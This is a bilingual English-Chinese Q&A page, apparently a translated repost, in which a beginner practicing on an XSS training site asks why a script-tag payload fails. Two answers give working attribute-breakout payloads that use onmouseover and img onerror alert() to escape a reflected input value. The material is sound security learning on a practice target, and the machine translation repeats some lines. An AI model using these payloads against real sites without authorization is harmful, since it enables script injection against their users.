漏洞赏金 XSS 漏洞网站负载
[英]Bug bounty XSS vulnerability website payload
问题描述
I recently started to teach myself XSS vulnerability and stumbled this website for practice.
我最近开始自学 XSS 漏洞并偶然发现了这个网站进行练习。
https://sudo.co.il/xss/level2.php
But after several attempts to enter several payloads但经过多次尝试输入多个有效载荷
Example: <script>alert('XSS')</script>
I can't get XSS to work.我无法让 XSS 工作。
2 个解决方案
解决方案1
2 2021-12-07 17:43:01
The value is reflected in the input value attribute.该值反映在输入值属性中。 You can escape this by starting with a " and then add other attributes. For example: " onmouseover="alert('XSS')" .您可以通过以"开头然后添加其他属性来转义它。例如: " onmouseover="alert('XSS')" 。
To require less user interaction you can change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"要减少用户交互,您可以更改样式: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px" " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px" or there may be better attributes to use instead. " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"或者可能有更好的属性可以代替。
解决方案2
0 2022-06-19 19:05:44
You can escape this by starting with a "您可以通过以"
For example: "><img/src=x onerror=alert(origin)>例如: "><img/src=x onerror=alert(origin)>
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.